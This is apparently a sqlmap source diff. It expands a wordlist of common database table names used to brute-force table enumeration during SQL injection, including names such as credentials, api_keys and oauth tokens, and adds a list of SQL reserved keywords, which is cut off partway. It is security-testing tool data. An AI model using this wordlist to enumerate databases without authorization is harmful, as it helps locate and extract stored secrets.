-dwp_foto_pictures -dwp_karte_speisen -dwp_news_kat -dwp_structur -dwp_foto_album -dwp_karte_kat bestellung -dwp_content be_users Vorlesungen -dwp_content_pic -dwp_link_entries -dwp_ecard_album persons -dwp_buchung_hotel -dwp_link_kat -dwp_news_absatz Assistenten Professoren Studenten -dwp_ecard_pictures lieferant -dwp_bewertung 
mitarbeiter gruppe -dwp_news_head wp_post2cat phpbb_forum_prune crops @@ -2910,7 +2532,6 @@ shop_settings tutorial motd_coding artikel_variationsgruppen -dwp_kontakt papers gesuche zahlung_weitere @@ -3009,6 +2630,7 @@ wp_categories chessmessages # site:br + endereco pessoa usuarios @@ -3171,6 +2793,7 @@ LT_CUSTOM2 LT_CUSTOM3 # site:es + jos_respuestas DEPARTAMENTO EMPLEADO @@ -3207,30 +2830,44 @@ nuke_gallery_pictures_newpicture Books grupo facturas +aclaraciones +preguntas +personas +estadisticas # site:cn + +yonghu +dingdan +shangpin +zhanghu +jiaoyi +zhifu +rizhi +quanxian +juese +caidan +xinxi +shuju +guanliyuan +xitong +peizhi +canshu +zidian url -cdb_adminactions BlockInfo -cdb_attachtypes cdb_attachments -mymps_lifebox cdb_buddys -mymps_payapi LastDate cdb_medals -mymps_payrecord cdb_forumlinks cdb_adminnotes cdb_admingroups -cdb_creditslog stkWeight -mymps_checkanswer cdb_announcements cdb_bbcodes cdb_advertisements cdb_memberfields -mymps_telephone cdb_forums cdb_forumfields cdb_favorites @@ -3258,31 +2895,22 @@ cdb_pluginvars pw_smiles cdb_modworks ncat -mymps_member_tpl pw_threads zl_admin cdb_onlinetime cdb_mythreads cdb_members spt_datatype_info -mymps_certification -mymps_badwords seentype -mymps_cache zl_article spt_datatype_info_ext cdb_debateposts -mymps_corp -mymps_member_album mgbliuyan pw_schcache zl_finance pw_banuser -mymps_news cdb_pluginhooks -mymps_member_docutype wp1_categories -cdb_magicmarket MSmerge_errorlineage cdb_activities zl_baoming @@ -3294,18 +2922,15 @@ cdb_itempool phpcms_announce pw_actions pw_msg -mymps_news_img cdb_debates cdb_magiclog pw_forums -mymps_channel cdb_polls t_stat pw_attachs cdb_plugins pw_membercredit cdb_posts -mymps_member_category cdb_activityapplies zl_media acctmanager @@ -3313,18 +2938,12 @@ pw_usergroups cdb_faqs cdb_onlinelist pw_hack -mymps_member_comment Market -mymps_config -mymps_mail_template -mymps_advertisement MSrepl_identity_range pw_favors -mymps_crons pw_config pw_credits cdb_failedlogins -mymps_member_docu pw_posts cdb_attachpaymentlog cdb_myposts @@ -3332,7 +2951,6 @@ cdb_polloptions wp1_comments cdb_caches pw_members -mymps_upload spt_provider_types pw_sharelinks pw_tmsgs @@ -3343,17 +2961,237 @@ aliasregex userfiles acctmanager2 cdb_pmsearchindex -mymps_news_focus cdb_forumrecommend publishers zl_advertisement guanggaotp pw_memberinfo aliastype -mymps_mail_sendlist -mymps_navurl + +# site:tr + +kullanici +kullanicilar +yonetici +yoneticiler +adres +adresler +yayincilar +yayinci +urun +urunler +kategori +kategoriler +ulke +ulkeler +siparis +siparisler +bayi +bayiler +stok +reklam +reklamlar +site +siteler +sayfa +sayfalar +icerik +icerikler +yazi +yazilar +genel +istatistik +istatistikler +duyuru +duyurular +haber +haberler +komisyon +ucret +ucretler +bilgi +basvuru +basvurular +kontak +kontaklar +kisi +kisiler +uye +uyeler +kayıt +kayıtlar +tel +telefon +telefonlar +numaralar +numara +kart +kartlar +kredi +krediler +kredikartı +fiyat +fiyatlar +odeme +odemeler +kategoriler +tbl_Uye +xml_kategoriler +tbl_siparis +tbl_googlemap +tbl_ilce +tbl_yardim +tbl_Resim +tbl_anket +tbl_Rapor +tbl_statsvisit +tbl_ticket +tbl_Cesit +tbl_xml +tbl_Cinsiyet +xml_urunler_temp +tbl_takvim +tbl_altkategori +tbl_mesaj +tbl_Haber +tbl_AdresTemp +tbl_Firma +tbl_Medya +xml_urunlerbirim +tbl_Yardim +tbl_medya +tbl_Video +xml_markalar_transfer +tbl_adrestemp +tbl_online +tbl_sehir +tbl_resim +tbl_Gorsel +tbl_doviz +tbl_gorsel +tbl_kampanya +tbl_Blog +tbl_Banners +tbl_koleksiyon +tbl_Galeri +tbl_Kampanya +tbl_Favori +tbl_sss +tbl_Banner 
+tbl_Faq +xml_markalar_temp +tbl_faq +tbl_Personel +tbl_Seo +tbl_adres +tbl_ayar +tbl_metin +tbl_AltKategori +tbl_kategori +tbl_Marka +tbl_blogkategori +tbl_ulke +tbl_sepetold +tbl_yorum +tbl_Fiyat +tbl_Reklam +tbl_Kategori +tbl_Yorum +tbl_semt +tbl_Tedarikci +xml_kampanyakategori +tbl_ozelgun +tbl_uyexml +tbl_rapor +tbl_seo +tbl_Indirim +tbl_Ilce +tbl_bulten +tbl_video +tbl_Ayar +tbl_fatura +tbl_cinsiyet +tbl_reklam +tbl_sliders +tbl_KDV +tbl_uye_img +tbl_siparisid +tbl_BlogKategori +tbl_Yonetici +tbl_kdv +tbl_Online +tbl_temsilci +tbl_Dil +tbl_banners +tbl_Mesaj +tbl_Logs +tbl_logs +tbl_fiyat +tbl_SSS +tbl_Puan +tbl_kargo +tbl_Statsvisit +tbl_Koleksiyon +tbl_dil +tbl_Sepetold +tbl_Fatura +tbl_yonetici +tbl_Yazilar +tbl_Temsilci +tbl_Kargo +tbl_cesit +tbl_uye +tbl_haber +tbl_SiparisID +tbl_Adres +tbl_Ozelgun +tbl_banka +tbl_Videogaleri +tbl_galeri +tbl_videogaleri +xml_urunresimleri +tbl_urun +tbl_Ticket +tbl_yazilar +tbl_Ulke +tbl_Urun +tbl_renk +tbl_Harita +tbl_Sepet +tbl_Sehir +tbl_Uye_Img +tbl_Semt +tbl_indirim +xml_kampanyakategori_transfer +tbl_Takvim +tbl_blog +tbl_Sliders +tbl_Renk +tbl_UyeXML +tbl_tedarikci +tbl_Fotogaleri +tbl_Doviz +tbl_Anket +tbl_Banka +tbl_Metin +tbl_XML +tbl_firma +tbl_harita +tbl_banner +tbl_sepet +tbl_fotogaleri +tbl_marka +tbl_Siparis +tbl_personel +tbl_puan +tbl_Bulten +tbl_favori +tbl_onlineusers + + # List provided by Pedrito Perez (0ark1ang3l@gmail.com) + adminstbl admintbl affiliateUsers @@ -3366,3 +3204,219 @@ tuser tusers userstbl usertbl + +# WebGoat + +user_data + +# https://laurent22.github.io/so-injections/ + +accounts +admin +baza_site +benutzer +category +comments +company +credentials +Customer +customers +data +details +dhruv_users +dt_tb +employees +events +forsale +friends +giorni +images +info +items +kontabankowe +login +logs +markers +members +messages +orders +order_table +photos +player +players +points +register +reports +rooms +shells +signup +songs +student +students +table +table2 +tbl_images +tblproduct +testv2 +tickets +topicinfo +trabajo +user +user_auth +userinfo +user_info +userregister +users +usuarios +utenti +wm_products +wp_payout_history +zamowienia + +# https://deliciousbrains.com/tour-wordpress-database/ + +wp_blogmeta +wp_blogs +wp_blog_versions +wp_commentmeta +wp_comments +wp_links +wp_options +wp_postmeta +wp_posts +wp_registration_log +wp_signups +wp_site +wp_sitemeta +wp_termmeta +wp_term_relationships +wp_terms +wp_term_taxonomy +wp_usermeta +wp_users + +# https://docs.joomla.org/Tables + +assets +bannerclient +banner +bannertrack +categories +components +contact_details +content_frontpage +content_rating +content +core_acl_aro_groups +core_acl_aro_map +core_acl_aro_sections +core_acl_aro +core_acl_groups_aro_map +core_log_items +core_log_searches +extensions +groups +languages +menu +menu_types +messages_cfg +messages +migration_backlinks +modules_menu +modules +newsfeeds +plugins +poll_data +poll_date +poll_menu +polls +redirect_links +Schemas +sections +session +stats_agents +templates_menu +template_styles +update_categories +update_sites_extensions +update_sites +updates +usergroups +user_profiles +users +user_usergroup_map +viewlevels +weblinks + +# site:nl + +gebruikers + +# asp.net + +AspNetUsers +AspNetRoles +AspNetUserRoles +AspNetUserClaims +AspNetUserLogins +AspNetRoleClaims +AspNetUserTokens +__EFMigrationsHistory + +# django + +auth_user +auth_group +auth_permission +django_session +django_migrations +django_content_type +django_admin_log + +# laravel + +migrations +password_resets +failed_jobs 
+personal_access_tokens +job_batches +model_has_roles +model_has_permissions +role_has_permissions + +# rails + +schema_migrations +ar_internal_metadata +active_storage_blobs +active_storage_attachments + +# misc. + +flyway_schema_history +databasechangelog +databasechangeloglock +alembic_version +knex_migrations +knex_migrations_lock +doctrine_migration_versions +api_keys +api_tokens +access_tokens +refresh_tokens +oauth_clients +oauth_access_tokens +oauth_refresh_tokens +webhooks +webhook_events +secrets +credentials +audit_logs +activity_logs +system_settings +feature_flags +tenants +subscriptions +users_bak +users_old +orders_backup
diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt new file mode 100644 index 00000000000..36d2773ef44 --- /dev/null +++ b/data/txt/keywords.txt @@ -0,0 +1,1635 @@ +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission +
+# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) + +ABSOLUTE +ACTION +ADD +ALL +ALLOCATE +ALTER +AND +ANY +ARE +AS +ASC +ASSERTION +AT +AUTHORIZATION +AVG +BEGIN +BETWEEN +BIT +BIT_LENGTH +BOTH +BY +CALL +CASCADE +CASCADED +CASE +CAST +CATALOG +CHAR +CHAR_LENGTH +CHARACTER +CHARACTER_LENGTH +CHECK +CLOSE +COALESCE +COLLATE +COLLATION +COLUMN +COMMIT +CONDITION +CONNECT +CONNECTION +CONSTRAINT +CONSTRAINTS +CONTAINS +CONTINUE +CONVERT +CORRESPONDING +COUNT +CREATE +CROSS +CURRENT +CURRENT_DATE +CURRENT_PATH +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +DATE +DAY +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFERRABLE +DEFERRED +DELETE +DESC +DESCRIBE +DESCRIPTOR +DETERMINISTIC +DIAGNOSTICS +DISCONNECT +DISTINCT +DO +DOMAIN +DOUBLE +DROP +ELSE +ELSEIF +END +ESCAPE +EXCEPT +EXCEPTION +EXEC +EXECUTE +EXISTS +EXIT +EXTERNAL +EXTRACT +FALSE +FETCH +FIRST +FLOAT +FOR +FOREIGN +FOUND +FROM +FULL +FUNCTION +GET +GLOBAL +GO +GOTO +GRANT +GROUP +HANDLER +HAVING +HOUR +IDENTITY +IF +IMMEDIATE +IN +INDICATOR +INITIALLY +INNER +INOUT +INPUT +INSENSITIVE +INSERT +INT +INTEGER +INTERSECT +INTERVAL +INTO +IS +ISOLATION +JOIN +KEY +LANGUAGE +LAST +LEADING +LEAVE +LEFT +LEVEL +LIKE +LOCAL +LOOP +LOWER +MATCH +MAX +MIN +MINUTE +MODULE +MONTH +NAMES +NATIONAL +NATURAL +NCHAR +NEXT +NO +NOT +NULL +NULLIF +NUMERIC +OCTET_LENGTH +OF +ON +ONLY +OPEN +OPTION +OR +ORDER +OUT +OUTER +OUTPUT +OVERLAPS +PAD +PARAMETER +PARTIAL +PATH +POSITION +PRECISION +PREPARE +PRESERVE +PRIMARY +PRIOR +PRIVILEGES +PROCEDURE +READ +REAL +REFERENCES +RELATIVE +REPEAT +RESIGNAL +RESTRICT +RETURN +RETURNS +REVOKE +RIGHT +ROLLBACK +ROUTINE +ROWS +SCHEMA +SCROLL +SECOND +SECTION +SELECT +SESSION +SESSION_USER +SET +SIGNAL +SIZE +SMALLINT +SOME +SPACE +SPECIFIC +SQL +SQLCODE +SQLERROR +SQLEXCEPTION +SQLSTATE +SQLWARNING +SUBSTRING +SUM +SYSTEM_USER +TABLE +TEMPORARY +THEN +TIME +TIMESTAMP +TIMEZONE_HOUR +TIMEZONE_MINUTE +TO +TRAILING +TRANSACTION +TRANSLATE +TRANSLATION +TRIM +TRUE +UNDO +UNION +UNIQUE +UNKNOWN +UNTIL +UPDATE +UPPER +USAGE +USER +USING +VALUE +VALUES +VARCHAR +VARYING +VIEW +WHEN +WHENEVER +WHERE +WHILE +WITH +WORK +WRITE +YEAR +ZONE +
+# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html) + +ADD +ALL +ALTER +ANALYZE +AND +AS +ASC +ASENSITIVE +BEFORE +BETWEEN +BIGINT +BINARY +BLOB +BOTH +BY +CALL +CASCADE +CASE +CHANGE +CAST +CHAR +CHARACTER +CHECK +COLLATE +COLUMN +CONCAT +CONDITION +CONSTRAINT +CONTINUE +CONVERT +CREATE +CROSS +CURRENT_DATE +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +DATABASE +DATABASES +DAY_HOUR +DAY_MICROSECOND +DAY_MINUTE +DAY_SECOND +DEC +DECIMAL +DECLARE +DEFAULT +DELAYED +DELETE +DESC +DESCRIBE +DETERMINISTIC +DISTINCT +DISTINCTROW +DIV +DOUBLE +DROP +DUAL +EACH +ELSE +ELSEIF +ENCLOSED +ESCAPED +EXISTS +EXIT +EXPLAIN +FALSE +FETCH +FLOAT +FLOAT4 +FLOAT8 +FOR +FORCE +FOREIGN +FROM +FULLTEXT +GRANT +GROUP +HAVING +HIGH_PRIORITY +HOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IF +IFNULL +IGNORE +IN +INDEX +INFILE +INNER +INOUT +INSENSITIVE +INSERT +INT +INT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERVAL +INTO +IS +ISNULL +ITERATE +JOIN +KEY +KEYS +KILL +LEADING +LEAVE +LEFT +LIKE +LIMIT +LINES +LOAD +LOCALTIME +LOCALTIMESTAMP +LOCK +LONG +LONGBLOB +LONGTEXT +LOOP +LOW_PRIORITY +MATCH +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXT +MIDDLEINT +MINUTE_MICROSECOND +MINUTE_SECOND +MOD +MODIFIES +NATURAL +NOT +NO_WRITE_TO_BINLOG +NULL +NUMERIC +ON +OPTIMIZE +OPTION +OPTIONALLY +OR +ORDER +OUT +OUTER +OUTFILE +PRECISION +PRIMARY +PROCEDURE +PURGE +READ +READS +REAL +REFERENCES +REGEXP +RELEASE +RENAME +REPEAT +REPLACE +REQUIRE +RESTRICT +RETURN +REVOKE +RIGHT +RLIKE +SCHEMA +SCHEMAS +SECOND_MICROSECOND +SELECT +SENSITIVE +SEPARATOR +SET +SHOW +SMALLINT +SONAME +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQL_BIG_RESULT +SQL_CALC_FOUND_ROWS +SQL_SMALL_RESULT +SSL +STARTING +STRAIGHT_JOIN +TABLE +TERMINATED +THEN +TINYBLOB +TINYINT +TINYTEXT +TO +TRAILING +TRIGGER +TRUE +UNDO +UNION +UNIQUE +UNLOCK +UNSIGNED +UPDATE +USAGE +USE +USING +UTC_DATE +UTC_TIME +UTC_TIMESTAMP +VALUES +VARBINARY +VARCHAR +VARCHARACTER +VARYING +VERSION +WHEN +WHERE +WHILE +WITH +WRITE +XOR +YEAR_MONTH +ZEROFILL +
+# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html) + +ACCESSIBLE +ACCOUNT +ACTION +ACTIVE +ADD +ADMIN +AFTER +AGAINST +AGGREGATE +ALGORITHM +ALL +ALTER +ALWAYS +ANALYSE +ANALYZE +AND +ANY +ARRAY +AS +ASC +ASCII +ASENSITIVE +AT +ATTRIBUTE +AUTHENTICATION +AUTOEXTEND_SIZE +AUTO_INCREMENT +AVG +AVG_ROW_LENGTH +BACKUP +BEFORE +BEGIN +BETWEEN +BIGINT +BINARY +BINLOG +BIT +BLOB +BLOCK +BOOL +BOOLEAN +BOTH +BTREE +BUCKETS +BULK +BY +BYTE +CACHE +CALL +CASCADE +CASCADED +CASE +CATALOG_NAME +CHAIN +CHALLENGE_RESPONSE +CHANGE +CHANGED +CHANNEL +CHAR +CHARACTER +CHARSET +CHECK +CHECKSUM +CIPHER +CLASS_ORIGIN +CLIENT +CLONE +CLOSE +COALESCE +CODE +COLLATE +COLLATION +COLUMN +COLUMNS +COLUMN_FORMAT +COLUMN_NAME +COMMENT +COMMIT +COMMITTED +COMPACT +COMPLETION +COMPONENT +COMPRESSED +COMPRESSION +CONCURRENT +CONDITION +CONNECTION +CONSISTENT +CONSTRAINT +CONSTRAINT_CATALOG +CONSTRAINT_NAME +CONSTRAINT_SCHEMA +CONTAINS +CONTEXT +CONTINUE +CONVERT +CPU +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_DATE +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +CURSOR_NAME +DATA +DATABASE +DATABASES +DATAFILE +DATE +DATETIME +DAY +DAY_HOUR +DAY_MICROSECOND +DAY_MINUTE +DAY_SECOND +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFAULT_AUTH +DEFINER +DEFINITION +DELAYED +DELAY_KEY_WRITE +DELETE +DENSE_RANK +DESC +DESCRIBE +DESCRIPTION +DES_KEY_FILE +DETERMINISTIC +DIAGNOSTICS +DIRECTORY +DISABLE +DISCARD +DISK +DISTINCT +DISTINCTROW +DIV +DO +DOUBLE +DROP +DUAL +DUMPFILE +DUPLICATE +DYNAMIC +EACH +ELSE +ELSEIF +EMPTY +ENABLE +ENCLOSED +ENCRYPTION +END +ENDS +ENFORCED +ENGINE +ENGINES +ENGINE_ATTRIBUTE +ENUM +ERROR +ERRORS +ESCAPE +ESCAPED +EVENT +EVENTS +EVERY +EXCEPT +EXCHANGE +EXCLUDE +EXECUTE +EXISTS +EXIT +EXPANSION +EXPIRE +EXPLAIN +EXPORT +EXTENDED +EXTENT_SIZE +FACTOR +FAILED_LOGIN_ATTEMPTS +FALSE +FAST +FAULTS +FETCH +FIELDS +FILE +FILE_BLOCK_SIZE +FILTER +FINISH +FIRST +FIRST_VALUE +FIXED +FLOAT +FLOAT4 +FLOAT8 +FLUSH +FOLLOWING
+FOLLOWS +FOR +FORCE +FOREIGN +FORMAT +FOUND +FROM +FULL +FULLTEXT +FUNCTION +GENERAL +GENERATE +GENERATED +GEOMCOLLECTION +GEOMETRY +GEOMETRYCOLLECTION +GET +GET_FORMAT +GET_MASTER_PUBLIC_KEY +GET_SOURCE_PUBLIC_KEY +GLOBAL +GRANT +GRANTS +GROUP +GROUPING +GROUPS +GROUP_REPLICATION +GTID_ONLY +HANDLER +HASH +HAVING +HELP +HIGH_PRIORITY +HISTOGRAM +HISTORY +HOST +HOSTS +HOUR +HOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IDENTIFIED +IF +IGNORE +IGNORE_SERVER_IDS +IMPORT +IN +INACTIVE +INDEX +INDEXES +INFILE +INITIAL +INITIAL_SIZE +INITIATE +INNER +INOUT +INSENSITIVE +INSERT +INSERT_METHOD +INSTALL +INSTANCE +INT +INT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERSECT +INTERVAL +INTO +INVISIBLE +INVOKER +IO +IO_AFTER_GTIDS +IO_BEFORE_GTIDS +IO_THREAD +IPC +IS +ISOLATION +ISSUER +ITERATE +JOIN +JSON +JSON_TABLE +JSON_VALUE +KEY +KEYRING +KEYS +KEY_BLOCK_SIZE +KILL +LAG +LANGUAGE +LAST +LAST_VALUE +LATERAL +LEAD +LEADING +LEAVE +LEAVES +LEFT +LESS +LEVEL +LIKE +LIMIT +LINEAR +LINES +LINESTRING +LIST +LOAD +LOCAL +LOCALTIME +LOCALTIMESTAMP +LOCK +LOCKED +LOCKS +LOGFILE +LOGS +LONG +LONGBLOB +LONGTEXT +LOOP +LOW_PRIORITY +MASTER +MASTER_AUTO_POSITION +MASTER_BIND +MASTER_COMPRESSION_ALGORITHMS +MASTER_CONNECT_RETRY +MASTER_DELAY +MASTER_HEARTBEAT_PERIOD +MASTER_HOST +MASTER_LOG_FILE +MASTER_LOG_POS +MASTER_PASSWORD +MASTER_PORT +MASTER_PUBLIC_KEY_PATH +MASTER_RETRY_COUNT +MASTER_SERVER_ID +MASTER_SSL +MASTER_SSL_CA +MASTER_SSL_CAPATH +MASTER_SSL_CERT +MASTER_SSL_CIPHER +MASTER_SSL_CRL +MASTER_SSL_CRLPATH +MASTER_SSL_KEY +MASTER_SSL_VERIFY_SERVER_CERT +MASTER_TLS_CIPHERSUITES +MASTER_TLS_VERSION +MASTER_USER +MASTER_ZSTD_COMPRESSION_LEVEL +MATCH +MAXVALUE +MAX_CONNECTIONS_PER_HOUR +MAX_QUERIES_PER_HOUR +MAX_ROWS +MAX_SIZE +MAX_UPDATES_PER_HOUR +MAX_USER_CONNECTIONS +MEDIUM +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXT +MEMBER +MEMORY +MERGE +MESSAGE_TEXT +MICROSECOND +MIDDLEINT +MIGRATE +MINUTE +MINUTE_MICROSECOND +MINUTE_SECOND +MIN_ROWS +MOD +MODE +MODIFIES +MODIFY +MONTH +MULTILINESTRING +MULTIPOINT +MULTIPOLYGON +MUTEX +MYSQL_ERRNO +NAME +NAMES +NATIONAL +NATURAL +NCHAR +NDB +NDBCLUSTER +NESTED +NETWORK_NAMESPACE +NEVER +NEW +NEXT +NO +NODEGROUP +NONE +NOT +NOWAIT +NO_WAIT +NO_WRITE_TO_BINLOG +NTH_VALUE +NTILE +NULL +NULLS +NUMBER +NUMERIC +NVARCHAR +OF +OFF +OFFSET +OJ +OLD +ON +ONE +ONLY +OPEN +OPTIMIZE +OPTIMIZER_COSTS +OPTION +OPTIONAL +OPTIONALLY +OPTIONS +OR +ORDER +ORDINALITY +ORGANIZATION +OTHERS +OUT +OUTER +OUTFILE +OVER +OWNER +PACK_KEYS +PAGE +PARSER +PARTIAL +PARTITION +PARTITIONING +PARTITIONS +PASSWORD_LOCK_TIME +PATH +PERCENT_RANK +PERSIST +PERSIST_ONLY +PHASE +PLUGIN +PLUGINS +PLUGIN_DIR +POINT +POLYGON +PORT +PRECEDES +PRECEDING +PRECISION +PREPARE +PRESERVE +PREV +PRIMARY +PRIVILEGES +PRIVILEGE_CHECKS_USER +PROCEDURE +PROCESS +PROCESSLIST +PROFILE +PROFILES +PROXY +PURGE +QUARTER +QUERY +QUICK +RANDOM +RANGE +RANK +READ +READS +READ_ONLY +READ_WRITE +REAL +REBUILD +RECOVER +RECURSIVE +REDOFILE +REDO_BUFFER_SIZE +REDUNDANT +REFERENCE +REFERENCES +REGEXP +REGISTRATION +RELAY +RELAYLOG +RELAY_LOG_FILE +RELAY_LOG_POS +RELAY_THREAD +RELEASE +RELOAD +REMOTE +REMOVE +RENAME +REORGANIZE +REPAIR +REPEAT +REPEATABLE +REPLACE +REPLICA +REPLICAS +REPLICATE_DO_DB +REPLICATE_DO_TABLE +REPLICATE_IGNORE_DB +REPLICATE_IGNORE_TABLE +REPLICATE_REWRITE_DB +REPLICATE_WILD_DO_TABLE +REPLICATE_WILD_IGNORE_TABLE +REPLICATION +REQUIRE +REQUIRE_ROW_FORMAT +RESET +RESIGNAL +RESOURCE +RESPECT +RESTART +RESTORE +RESTRICT +RESUME +RETAIN +RETURN +RETURNED_SQLSTATE +RETURNING +RETURNS +REUSE +REVERSE +REVOKE +RIGHT +RLIKE 
+ROLE +ROLLBACK +ROLLUP +ROTATE +ROUTINE +ROW +ROWS +ROW_COUNT +ROW_FORMAT +ROW_NUMBER +RTREE +SAVEPOINT +SCHEDULE +SCHEMA +SCHEMAS +SCHEMA_NAME +SECOND +SECONDARY +SECONDARY_ENGINE +SECONDARY_ENGINE_ATTRIBUTE +SECONDARY_LOAD +SECONDARY_UNLOAD +SECOND_MICROSECOND +SECURITY +SELECT +SENSITIVE +SEPARATOR +SERIAL +SERIALIZABLE +SERVER +SESSION +SET +SHARE +SHOW +SHUTDOWN +SIGNAL +SIGNED +SIMPLE +SKIP +SLAVE +SLOW +SMALLINT +SNAPSHOT +SOCKET +SOME +SONAME +SOUNDS +SOURCE +SOURCE_AUTO_POSITION +SOURCE_BIND +SOURCE_COMPRESSION_ALGORITHMS +SOURCE_CONNECT_RETRY +SOURCE_DELAY +SOURCE_HEARTBEAT_PERIOD +SOURCE_HOST +SOURCE_LOG_FILE +SOURCE_LOG_POS +SOURCE_PASSWORD +SOURCE_PORT +SOURCE_PUBLIC_KEY_PATH +SOURCE_RETRY_COUNT +SOURCE_SSL +SOURCE_SSL_CA +SOURCE_SSL_CAPATH +SOURCE_SSL_CERT +SOURCE_SSL_CIPHER +SOURCE_SSL_CRL +SOURCE_SSL_CRLPATH +SOURCE_SSL_KEY +SOURCE_SSL_VERIFY_SERVER_CERT +SOURCE_TLS_CIPHERSUITES +SOURCE_TLS_VERSION +SOURCE_USER +SOURCE_ZSTD_COMPRESSION_LEVEL +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQL_AFTER_GTIDS +SQL_AFTER_MTS_GAPS +SQL_BEFORE_GTIDS +SQL_BIG_RESULT +SQL_BUFFER_RESULT +SQL_CACHE +SQL_CALC_FOUND_ROWS +SQL_NO_CACHE +SQL_SMALL_RESULT +SQL_THREAD +SQL_TSI_DAY +SQL_TSI_HOUR +SQL_TSI_MINUTE +SQL_TSI_MONTH +SQL_TSI_QUARTER +SQL_TSI_SECOND +SQL_TSI_WEEK +SQL_TSI_YEAR +SRID +SSL +STACKED +START +STARTING +STARTS +STATS_AUTO_RECALC +STATS_PERSISTENT +STATS_SAMPLE_PAGES +STATUS +STOP +STORAGE +STORED +STRAIGHT_JOIN +STREAM +STRING +SUBCLASS_ORIGIN +SUBJECT +SUBPARTITION +SUBPARTITIONS +SUPER +SUSPEND +SWAPS +SWITCHES +SYSTEM +TABLE +TABLES +TABLESPACE +TABLE_CHECKSUM +TABLE_NAME +TEMPORARY +TEMPTABLE +TERMINATED +TEXT +THAN +THEN +THREAD_PRIORITY +TIES +TIME +TIMESTAMP +TIMESTAMPADD +TIMESTAMPDIFF +TINYBLOB +TINYINT +TINYTEXT +TLS +TO +TRAILING +TRANSACTION +TRIGGER +TRIGGERS +TRUE +TRUNCATE +TYPE +TYPES +UNBOUNDED +UNCOMMITTED +UNDEFINED +UNDO +UNDOFILE +UNDO_BUFFER_SIZE +UNICODE +UNINSTALL +UNION +UNIQUE +UNKNOWN +UNLOCK +UNREGISTER +UNSIGNED +UNTIL +UPDATE +UPGRADE +URL +USAGE +USE +USER +USER_RESOURCES +USE_FRM +USING +UTC_DATE +UTC_TIME +UTC_TIMESTAMP +VALIDATION +VALUE +VALUES +VARBINARY +VARCHAR +VARCHARACTER +VARIABLES +VARYING +VCPU +VIEW +VIRTUAL +VISIBLE +WAIT +WARNINGS +WEEK +WEIGHT_STRING +WHEN +WHERE +WHILE +WINDOW +WITH +WITHOUT +WORK +WRAPPER +WRITE +X509 +XA +XID +XML +XOR +YEAR +YEAR_MONTH +ZEROFILL +ZONE + +# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html) + +ABS +ACOS +ALL +ALLOCATE +ALTER +ANALYSE +ANALYZE +AND +ANY +ARE +ARRAY +ARRAY_AGG +ARRAY_MAX_CARDINALITY +AS +ASC +ASENSITIVE +ASIN +ASYMMETRIC +AT +ATAN +ATOMIC +AUTHORIZATION +AVG +BEGIN +BEGIN_FRAME +BEGIN_PARTITION +BETWEEN +BIGINT +BINARY +BLOB +BOOLEAN +BOTH +BY +CALL +CALLED +CARDINALITY +CASCADED +CASE +CAST +CEIL +CEILING +CHAR +CHARACTER +CHARACTER_LENGTH +CHAR_LENGTH +CHECK +CLASSIFIER +CLOB +CLOSE +COALESCE +COLLATE +COLLATION +COLLECT +COLUMN +COMMIT +CONCURRENTLY +CONDITION +CONNECT +CONSTRAINT +CONTAINS +CONVERT +COPY +CORR +CORRESPONDING +COS +COSH +COUNT +COVAR_POP +COVAR_SAMP +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_CATALOG +CURRENT_DATE +CURRENT_DEFAULT_TRANSFORM_GROUP +CURRENT_PATH +CURRENT_ROLE +CURRENT_ROW +CURRENT_SCHEMA +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_TRANSFORM_GROUP_FOR_TYPE +CURRENT_USER +CURSOR +CYCLE +DATALINK +DATE +DAY +DEALLOCATE +DEC +DECFLOAT +DECIMAL +DECLARE +DEFAULT +DEFERRABLE +DEFINE +DELETE +DENSE_RANK +DEREF +DESC +DESCRIBE +DETERMINISTIC +DISCONNECT 
+DISTINCT +DLNEWCOPY +DLPREVIOUSCOPY +DLURLCOMPLETE +DLURLCOMPLETEONLY +DLURLCOMPLETEWRITE +DLURLPATH +DLURLPATHONLY +DLURLPATHWRITE +DLURLSCHEME +DLURLSERVER +DLVALUE +DO +DOUBLE +DROP +DYNAMIC +EACH +ELEMENT +ELSE +EMPTY +END +END-EXEC +END_FRAME +END_PARTITION +EQUALS +ESCAPE +EVERY +EXCEPT +EXEC +EXECUTE +EXISTS +EXP +EXTERNAL +EXTRACT +FALSE +FETCH +FILTER +FIRST_VALUE +FLOAT +FLOOR +FOR +FOREIGN +FRAME_ROW +FREE +FREEZE +FROM +FULL +FUNCTION +FUSION +GET +GLOBAL +GRANT +GROUP +GROUPING +GROUPS +HAVING +HOLD +HOUR +IDENTITY +ILIKE +IMPORT +IN +INDICATOR +INITIAL +INITIALLY +INNER +INOUT +INSENSITIVE +INSERT +INT +INTEGER +INTERSECT +INTERSECTION +INTERVAL +INTO +IS +ISNULL +JOIN +JSON_ARRAY +JSON_ARRAYAGG +JSON_EXISTS +JSON_OBJECT +JSON_OBJECTAGG +JSON_QUERY +JSON_TABLE +JSON_TABLE_PRIMITIVE +JSON_VALUE +LAG +LANGUAGE +LARGE +LAST_VALUE +LATERAL +LEAD +LEADING +LEFT +LIKE +LIKE_REGEX +LIMIT +LISTAGG +LN +LOCAL +LOCALTIME 